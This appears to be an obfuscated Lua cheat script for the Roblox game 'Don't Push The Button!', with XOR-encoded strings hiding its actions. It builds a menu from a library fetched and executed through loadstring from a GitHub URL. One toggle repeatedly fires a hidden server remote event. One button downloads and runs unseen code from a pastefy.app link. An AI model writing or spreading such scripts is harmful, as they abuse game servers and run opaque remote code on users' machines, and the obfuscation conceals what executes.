--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v13,v14) local v15={};for v19=1, #v13 do v6(v15,v0(v4(v1(v2(v13,v19,v19 + 1 )),v1(v2(v14,1 + (v19% #v14) ,1 + (v19% #v14) + 1 )))%256 ));end return v5(v15);end GameName="Don't Push The Button!";tab1name=v7("\252\194\210\43","\126\177\163\187\69\134\219\167");local v8=loadstring(game:HttpGet("https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/wizard"))();local v9=v8:NewWindow(GameName);local v10=v9:NewSection(tab1name);v10:CreateToggle(v7("\2\216\62\202\188\17\194\38\201","\156\67\173\74\165"),function(v16) local v17=0;while true do if (v17==(0 + 0)) then _G.name=v16;while _G.name==true  do local v20=0 + 0 ;while true do if (v20==0) then game:GetService(v7("\6\178\89\26\181\37\71\32\178\77\37\168\41\84\53\176\76","\38\84\215\41\118\220\70")):WaitForChild(v7("\98\19\47\29\234\85\5","\158\48\118\66\114")):WaitForChild(v7("\152\52\25\56\86\179\254\165\48","\155\203\68\112\86\19\197")):FireServer();wait();break;end end end break;end end end);local v11=v9:NewSection(v7("\96\209\63\242\71","\152\38\189\86\156\32\24\133"));v11:CreateButton(v7("\221\89\179\79\253\81\172","\38\156\55\199"),function(v18) loadstring(game:HttpGet("https://pastefy.app/tvGsqkPf/raw"))();end);local v12=v9:NewSection(v7("\152\116\123\56\26\120\245\87\174\120\112\36","\35\200\29\28\72\115\20\154"));
